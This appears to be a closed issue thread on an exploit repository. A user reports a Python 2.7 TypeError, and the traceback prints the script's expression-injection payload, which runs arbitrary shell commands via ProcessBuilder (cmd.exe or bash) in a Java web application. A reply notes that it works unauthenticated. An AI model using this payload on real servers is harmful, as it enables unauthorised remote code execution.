Closed 0xabdi closed 3 years ago
When I run using python 2.7, I am getting the below error:
Traceback (most recent call last):
File "", line 62, in <module>
File "", line 53, in cmdExec
xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new; var bufferedReader = new; var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
TypeError: cannot concatenate 'str' and 'builtin_function_or_method' objects
Realized I was not authenticate. Does the exploit only work against authenticated instances? If yes, we can close this issue.
this exploit only works unauthenticated